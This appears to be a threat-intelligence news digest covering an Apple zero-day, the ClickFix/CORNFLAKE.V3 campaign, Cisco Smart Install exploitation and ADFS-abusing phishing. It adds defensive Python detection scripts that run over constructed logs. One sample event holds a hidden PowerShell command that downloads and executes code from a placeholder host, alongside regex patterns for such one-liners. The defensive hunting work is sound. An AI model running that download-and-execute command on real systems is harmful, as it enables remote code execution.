TRENDING TOPICS AUG 21, 2025

Apple Patches CVE-2025-43300 Zero-Day Exploited in Sophisticated Attacks 

Apple has released emergency updates for CVE-2025-43300, a zero-day in the Image I/O framework that Apple says was exploited in an "extremely sophisticated attack" against specific targeted individuals. The flaw is an out-of-bounds write: a maliciously crafted image file can make the parser write data past the end of its allocated buffer, corrupting memory and, depending on how the primitive is leveraged, crashing the process or achieving code execution. Apple has rolled out fixes across its ecosystem, including iOS 18.6.2, iPadOS 18.6.2 and 17.7.10, and macOS Sequoia 15.6.1, Sonoma 14.7.8, and Ventura 13.7.8. While Apple confirmed exploitation in targeted campaigns, it has not released details of the threat actors or attack methods, in keeping with its practice of withholding information that could help other adversaries replicate the exploit. The vulnerability affects a broad range of devices, including the iPhone XS and later, numerous iPad models across the Pro and consumer lines, and Macs running the three latest macOS versions. This is Apple's sixth zero-day fix in 2025, following patches in January, February, March, and April, and continues a pattern of high-value targeting of Apple platforms; in 2024 the company addressed six exploited zero-days. Although current exploitation appears limited to high-value targets, Apple urges all users to install the updates immediately, since exploits first used in narrow campaigns are frequently repurposed more broadly once details circulate. The fix adds bounds checking so that malformed image data is rejected before the out-of-bounds write can occur.

Update: UNC5518 Uses Fake CAPTCHA Pages to Deliver CORNFLAKE.V3 Backdoor 

Threat actor UNC5518 has been compromising legitimate websites and injecting ClickFix lures that appear as fake CAPTCHA verification pages. These overlays trick users into running an obfuscated PowerShell command that the page's JavaScript has already placed on the clipboard, typically by pasting it into the Windows Run dialog, which starts a multi-stage infection chain. UNC5518 operates as an access-as-a-service provider, handing the resulting foothold to partners including UNC5774, who deploy the CORNFLAKE.V3 backdoor. This version adds persistence via a registry Run key, HTTP-based C2 with XOR-encoded traffic, and support for executable, DLL, JavaScript, and batch-script payloads. Rather than dropping a custom binary, the malware stages a legitimate Node.js or PHP runtime under %APPDATA% and runs its script through it, and it performs anti-VM checks to avoid sandbox environments. These features mark a deliberate evolution from earlier CORNFLAKE variants, which lacked persistence and relied on simpler downloaders. Once active, CORNFLAKE.V3 performs extensive reconnaissance with built-in commands such as systeminfo, tasklist, and arp, alongside Active Directory enumeration to map domain trusts, identify administrators, and support credential theft through Kerberoasting. Newer variants route C2 through Cloudflare Tunnels, disguise malicious DLLs as benign file types, and add commands for heartbeat and autorun functions. The campaign has also deployed a secondary payload, WINDYTWIST.SEA, a resilient implant with reverse-shell capabilities and multiple fallback C2 servers, which underscores the layered nature of these operations. Observed process chains show explorer.exe spawning PowerShell, which in turn executes node.exe or php.exe, eventually loading the disguised DLLs through rundll32.exe. 
To counter this threat, organizations should restrict execution of scripts and unsigned binaries from user-writable directories such as %APPDATA%, disable or limit the Windows Run dialog by policy, enable PowerShell script block logging and alert on PowerShell spawned by explorer.exe with hidden or encoded-command flags, and monitor outbound connections to Node.js and PHP distribution sources so the runtime download is caught at an early stage.
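The process chain above is concrete enough to hunt for. The following is an added example written for this digest, not code from the original report or from Mandiant: it walks Sysmon-style process-creation events and flags each stage of the chain (explorer.exe spawning PowerShell with lure-style flags, a Node.js or PHP runtime staged under %APPDATA% and launched by that PowerShell, and rundll32.exe loading a file that is not named *.dll). The events are constructed sample data; field names follow Sysmon Event ID 1, and the command-line flag patterns are an assumption about what ClickFix one-liners look like.

```python
"""Hunt for the CORNFLAKE.V3 execution chain in process-creation telemetry.

Added example, not code from the original report: flags the chain
explorer.exe -> powershell.exe -> node.exe/php.exe staged under %APPDATA%
-> rundll32.exe loading a DLL disguised with another extension. Field names
follow Sysmon Event ID 1; the events below are constructed sample data.
"""
import re
from typing import Any, Dict, List, Tuple

Event = Dict[str, Any]

SCRIPT_RUNTIMES = {"node.exe", "php.exe"}
# %APPDATA% resolves to C:\Users\<user>\AppData\Roaming on Windows.
APPDATA_RE = re.compile(r"\\users\\[^\\]+\\appdata\\roaming\\", re.IGNORECASE)
# Flags typical of ClickFix one-liners pasted into the Run dialog (assumed patterns).
SUSPICIOUS_PS_RE = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|e(?:nc(?:odedcommand)?)?\s|ep\s+bypass|executionpolicy\s+bypass)"
    r"|\biex\b|invoke-expression|downloadstring|\b(?:irm|iwr)\b",
    re.IGNORECASE,
)
RUNDLL_ARG_RE = re.compile(r'rundll32(?:\.exe)?\s+"?([^",\s]+)"?', re.IGNORECASE)


def image_name(path: str) -> str:
    """Basename of a Windows image path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(event: Event, by_pid: Dict[int, Event]) -> List[Event]:
    """Parent, grandparent, ... of event, following ParentProcessId (cycle-safe)."""
    chain: List[Event] = []
    seen = {event["ProcessId"]}
    cur = event
    while True:
        parent = by_pid.get(cur["ParentProcessId"])
        if parent is None or parent["ProcessId"] in seen:
            return chain
        chain.append(parent)
        seen.add(parent["ProcessId"])
        cur = parent


def find_cornflake_chains(events: List[Event]) -> List[Tuple[str, int]]:
    """Return (stage, ProcessId) pairs for each suspicious process found."""
    by_pid = {e["ProcessId"]: e for e in events}
    hits: List[Tuple[str, int]] = []
    for e in events:
        img = image_name(e["Image"])
        parent_imgs = [image_name(p["Image"]) for p in ancestors(e, by_pid)]
        # Stage 1: explorer.exe (Run dialog) spawning PowerShell with lure-style flags.
        if img == "powershell.exe" and parent_imgs[:1] == ["explorer.exe"] \
                and SUSPICIOUS_PS_RE.search(e["CommandLine"]):
            hits.append(("clickfix_powershell", e["ProcessId"]))
        # Stage 2: a legitimate Node.js/PHP runtime staged in %APPDATA%, launched by PowerShell.
        elif img in SCRIPT_RUNTIMES and APPDATA_RE.search(e["Image"]) \
                and "powershell.exe" in parent_imgs:
            hits.append(("appdata_runtime", e["ProcessId"]))
        # Stage 3: rundll32 loading a file not named *.dll, descended from that runtime.
        elif img == "rundll32.exe" and SCRIPT_RUNTIMES & set(parent_imgs):
            m = RUNDLL_ARG_RE.search(e["CommandLine"])
            if m and not m.group(1).lower().endswith(".dll"):
                hits.append(("disguised_dll", e["ProcessId"]))
    return hits


# Constructed sample telemetry (not real events): one malicious chain, two benign processes.
SAMPLE_EVENTS: List[Event] = [
    {"ProcessId": 100, "ParentProcessId": 1, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": "explorer.exe"},
    {"ProcessId": 200, "ParentProcessId": 100,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (irm http://example.invalid/a)"'},
    {"ProcessId": 300, "ParentProcessId": 200,
     "Image": r"C:\Users\alice\AppData\Roaming\node\node.exe",
     "CommandLine": r"node.exe C:\Users\alice\AppData\Roaming\node\run.js"},
    {"ProcessId": 400, "ParentProcessId": 300, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\alice\AppData\Roaming\node\update.log,Start"},
    # Benign: a user opening PowerShell from the Start menu, then Node from Program Files.
    {"ProcessId": 500, "ParentProcessId": 100,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
    {"ProcessId": 600, "ParentProcessId": 500, "Image": r"C:\Program Files\nodejs\node.exe",
     "CommandLine": "node.exe app.js"},
]

if __name__ == "__main__":
    for stage, pid in find_cornflake_chains(SAMPLE_EVENTS):
        print(f"{stage}: pid {pid}")
```

Stage 1 deliberately requires lure-style flags on the command line, because explorer.exe launching PowerShell on its own is what happens every time a user opens a shell from the Start menu; the %APPDATA% runtime and the non-.dll rundll32 argument are the stronger signals and would each merit an alert on their own.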

FBI Warns of Russian Exploitation of CVE-2018-0171 in Cisco Devices 

The FBI has issued a heightened alert regarding Russian state-backed hackers linked to the FSB’s Center 16 unit, known as Berserk Bear (also tracked as Blue Kraken, Crouching Yeti, Dragonfly, and Koala Team). These actors are actively exploiting a seven-year-old vulnerability, CVE-2018-0171, in Cisco devices running IOS and IOS XE software. The flaw resides in Cisco’s Smart Install protocol, a feature often left enabled in enterprise and critical infrastructure environments for simplified device management. Exploitation enables unauthenticated attackers to reload devices remotely, induce denial-of-service (DoS) conditions, or even execute arbitrary code. The FBI reports that Berserk Bear has exploited this flaw to collect and modify configuration files from thousands of devices associated with U.S. critical infrastructure, thereby granting them unauthorized access to networks of strategic value. Their targeting indicates a strong interest in industrial control system (ICS) protocols and applications, underscoring the risk of operational disruption. Cisco Talos further warns that this campaign extends far beyond the U.S., impacting telecommunications, higher education, and manufacturing organizations across North America, Europe, Asia, and Africa. The threat group has deployed custom SNMP-based tooling for persistence and evasion, while in some cases using legacy implants, including SYNful Knock, first uncovered in 2015, to maintain long-term footholds. Cisco stresses that although Berserk Bear is currently the most visible actor exploiting CVE-2018-0171, other state-sponsored adversaries are likely conducting similar campaigns, raising the global risk level. Because Smart Install has been abused consistently since at least 2021, organizations that remain unpatched are at significant risk of compromise. 
To mitigate, administrators should apply the Cisco fixes for CVE-2018-0171 immediately, disable Smart Install wherever it is not required (the IOS command is no vstack; where it must stay enabled, restrict TCP port 4786 to the Smart Install director with an ACL), and monitor for unauthorized configuration changes, unexpected reloads, and anomalous management traffic such as SNMP writes or TFTP transfers from unexpected hosts that could signal ongoing exploitation.
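One concrete way to watch for the configuration tampering described above is to alert on the device's own syslog. The following is an added example for this digest, not code from the FBI or Cisco advisories: it parses %SYS-5-CONFIG_I and %SYS-5-RELOAD messages and raises an alert when a change or reload originated outside the management allowlist or was made by an unexpected account. The log lines, the allowlists, and the exact line layout (timestamp, hostname, sequence number, message) are constructed; verify the layout against what your own collector receives.

```python
"""Flag Cisco IOS configuration changes and reloads from untrusted sources.

Added example, not code from the FBI or Cisco advisories: parses
%SYS-5-CONFIG_I and %SYS-5-RELOAD syslog messages and alerts when the change
or reload came from outside the management allowlist. Log lines, allowlists
and the line layout are constructed.
"""
import ipaddress
import re
from typing import Iterable, List, Tuple

SYSLOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ [\d:]+) (?P<host>\S+) \d+: "
    r"%(?P<mnemonic>[A-Z0-9_]+-\d-[A-Z0-9_]+): (?P<msg>.*)$"
)
# "Configured from console by admin on vty0 (10.10.5.20)" or "Configured from 203.0.113.9 by snmp"
CONFIG_RE = re.compile(
    r"Configured from (?P<src>\S+) by (?P<user>\S+?)(?: on (?P<line>\S+) \((?P<ip>[\d.]+)\))?$"
)
RELOAD_RE = re.compile(r"Reload requested by (?P<user>\S+) on (?P<line>\S+)(?: \((?P<ip>[\d.]+)\))?")

MGMT_NETS = ["10.10.5.0/24"]            # assumed: the only networks allowed to manage devices
ALLOWED_USERS = {"admin", "console"}    # assumed: accounts expected to change configs

Alert = Tuple[str, str, str]  # (device, reason, detail)


def audit_cisco_syslog(lines: Iterable[str], mgmt_nets: List[str], allowed_users) -> List[Alert]:
    nets = [ipaddress.ip_network(n) for n in mgmt_nets]

    def trusted(origin: str) -> bool:
        """True if origin is an IP address inside the management allowlist."""
        try:
            addr = ipaddress.ip_address(origin)
        except ValueError:
            return False
        return any(addr in net for net in nets)

    alerts: List[Alert] = []
    for line in lines:
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        host, mnemonic, msg = m["host"], m["mnemonic"], m["msg"]
        if mnemonic == "SYS-5-CONFIG_I":
            c = CONFIG_RE.search(msg)
            if not c:
                continue
            # Interactive sessions carry the client IP after the line name; non-interactive
            # changes (SNMP, TFTP) name the remote host in the "from" field instead.
            origin = c["ip"] or (None if c["src"] in ("console", "memory") else c["src"])
            if origin is not None and not trusted(origin):
                alerts.append((host, "config change from untrusted source", f"{c['user']}@{origin}"))
            elif c["user"] not in allowed_users:
                alerts.append((host, "config change by unexpected user", c["user"]))
        elif mnemonic == "SYS-5-RELOAD":
            r = RELOAD_RE.search(msg)
            if r and r["ip"] and not trusted(r["ip"]):
                alerts.append((host, "reload requested from untrusted source", f"{r['user']}@{r['ip']}"))
    return alerts


# Constructed sample log: a benign change, an interactive change and an SNMP-driven change
# from an outside address, a reload from that address, an unrelated link event, and a change
# by an account that is not on the allowlist.
SAMPLE_LOG = [
    "Aug 21 03:14:07 core-sw1 101: %SYS-5-CONFIG_I: Configured from console by admin on vty0 (10.10.5.20)",
    "Aug 21 03:22:41 core-sw1 102: %SYS-5-CONFIG_I: Configured from console by admin on vty1 (203.0.113.9)",
    "Aug 21 03:23:05 edge-rtr2 77: %SYS-5-CONFIG_I: Configured from 203.0.113.9 by snmp",
    "Aug 21 03:25:30 edge-rtr2 78: %SYS-5-RELOAD: Reload requested by admin on vty0 (203.0.113.9). Reload Reason: Reload command.",
    "Aug 21 03:30:00 core-sw1 103: %LINK-3-UPDOWN: Interface GigabitEthernet1/0/1, changed state to down",
    "Aug 21 03:31:00 core-sw1 104: %SYS-5-CONFIG_I: Configured from console by svc-backup on vty0 (10.10.5.21)",
]

if __name__ == "__main__":
    for device, reason, detail in audit_cisco_syslog(SAMPLE_LOG, MGMT_NETS, ALLOWED_USERS):
        print(f"{device}: {reason} ({detail})")
```

The SNMP case matters for this campaign in particular: a configuration pulled or pushed through SNMP never shows up as a vty login, so rules that only key on terminal sessions miss it. Pair this with archive logging (archive / log config) on the devices themselves so the content of each change is also recorded.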

Researchers Expose ADFS-Abusing Phishing Campaign Targeting Microsoft 365 

Researchers at Push Security have identified a phishing campaign that abuses Microsoft's Active Directory Federation Services (ADFS) to steal Microsoft 365 credentials. The campaign uses malvertising in Google search results: users searching for "Office 365" or mistyped variants are shown sponsored ads crafted to look authentic. The ads carry Google tracking parameters and push victims through a redirect chain that ends at a reverse-proxy phishing site able to capture the session and bypass multi-factor authentication. The phishing kit itself is a standard Attacker-in-the-Middle implementation; what is novel is the delivery chain, which abuses Microsoft's own federation redirects. The adversaries set up their own Microsoft tenants with custom domains federated to attacker-controlled ADFS servers, so that Microsoft's login flow for those domains hands the user off to the attacker's endpoint. To build credibility, the domains are hosted with AI-generated content, fabricated author profiles, and blog-style pages, which avoids immediate reputation blocking and survives surface-level inspection. Push Security's analysis shows the redirects behave like an open redirect: the hop originates from login.microsoftonline[.]com before diverting to attacker infrastructure, which lends legitimacy to the phishing flow and defeats URL-based detection in environments that rely on domain categorization. In some cases the federated tenant sent victims directly to the attacker's credential-capture page. To counter these tactics, defenders should monitor proxy logs for ADFS redirects containing /adfs/ls/ whose destination is outside the organization's trusted federation servers, block malvertising through enterprise ad filtering, ingest threat intelligence on newly observed redirect domains, and correlate endpoint telemetry with browser activity to detect Attacker-in-the-Middle patterns.
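The proxy-log hunt suggested above is straightforward to implement. The following is an added example for this digest, not Push Security's tooling or code from the original write-up: it flags any request to /adfs/ls/ on a host that is not one of the organization's known federation servers, and raises the severity when the same client had just visited login.microsoftonline.com, which is the open-redirect sequence described above. The log lines, the trusted federation host, and the log layout (UTC timestamp, client IP, method, URL) are constructed; the wtrealm value it looks for is the one Microsoft 365 uses for federated sign-in.

```python
"""Hunt proxy logs for ADFS federation redirects that leave trusted tenants.

Added example, not Push Security's tooling: flags requests to /adfs/ls/ on
hosts outside the org's known federation servers and raises severity when the
same client had just hit login.microsoftonline.com. Log lines, trusted host
and log layout (UTC timestamp, client IP, method, URL) are constructed.
"""
from datetime import datetime, timedelta
from typing import Any, Dict, Iterable, List
from urllib.parse import urlsplit

TRUSTED_ADFS_HOSTS = {"sts.corp.example.com"}   # assumed: the org's real ADFS endpoint
MS_LOGIN_HOSTS = {"login.microsoftonline.com"}   # where the federation redirect originates
REDIRECT_WINDOW = timedelta(seconds=30)          # max gap between MS login and the ADFS hop
M365_REALM = "urn:federation:microsoftonline"    # wtrealm used for Microsoft 365 federation


def parse_line(line: str) -> Dict[str, Any]:
    """Split one constructed proxy log line into its fields and URL components."""
    ts, client, method, url = line.split(maxsplit=3)
    parts = urlsplit(url)
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
        "client": client,
        "method": method,
        "url": url,
        "host": (parts.hostname or "").lower(),
        "path": parts.path.lower(),
        "query": parts.query.lower(),
    }


def hunt_adfs_redirects(lines: Iterable[str], trusted_hosts=TRUSTED_ADFS_HOSTS) -> List[Dict[str, Any]]:
    """Return one alert per /adfs/ls/ request to a host outside trusted_hosts."""
    last_ms_login: Dict[str, datetime] = {}
    alerts: List[Dict[str, Any]] = []
    for rec in (parse_line(l) for l in lines if l.strip()):
        if rec["host"] in MS_LOGIN_HOSTS:
            # Remember when this client last touched the Microsoft login front door.
            last_ms_login[rec["client"]] = rec["ts"]
            continue
        if "/adfs/ls/" not in rec["path"] or rec["host"] in trusted_hosts:
            continue
        prev = last_ms_login.get(rec["client"])
        followed_login = prev is not None and timedelta(0) <= rec["ts"] - prev <= REDIRECT_WINDOW
        alerts.append({
            "client": rec["client"],
            "host": rec["host"],
            # An ADFS hop right after login.microsoftonline.com is the federation redirect itself.
            "severity": "high" if followed_login else "medium",
            "m365_realm": M365_REALM in rec["query"],
            "url": rec["url"],
        })
    return alerts


# Constructed sample log: a legitimate federated login, a malvertising victim whose Microsoft
# login is redirected to an attacker-run ADFS host, and a stray ADFS request with no preceding login.
SAMPLE_PROXY_LOG = [
    "2025-08-21T09:12:01Z 10.20.30.41 GET https://login.microsoftonline.com/common/oauth2/authorize",
    "2025-08-21T09:12:02Z 10.20.30.41 GET https://sts.corp.example.com/adfs/ls/?wa=wsignin1.0&wtrealm=urn:federation:MicrosoftOnline",
    "2025-08-21T09:40:10Z 10.20.30.55 GET https://www.google.com/search?q=office+365",
    "2025-08-21T09:40:18Z 10.20.30.55 GET https://login.microsoftonline.com/login.srf",
    "2025-08-21T09:40:19Z 10.20.30.55 GET https://office-365-guide.example/adfs/ls/?wa=wsignin1.0&wtrealm=urn:federation:MicrosoftOnline",
    "2025-08-21T10:05:00Z 10.20.30.77 GET https://blog.example.net/adfs/ls/?wa=wsignin1.0",
]

if __name__ == "__main__":
    for a in hunt_adfs_redirects(SAMPLE_PROXY_LOG):
        print(f"[{a['severity']}] {a['client']} -> {a['host']} (m365 realm: {a['m365_realm']})")
```

Because the redirect is issued by Microsoft's own login host, nothing about the first hop looks wrong; the only anomaly is the destination, so the trusted-host set has to be an explicit inventory of the federation servers the organization actually runs rather than anything inferred from reputation.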

💡
Hunter Strategy encourages our readers to look for updates in our daily Trending Topics and on Twitter.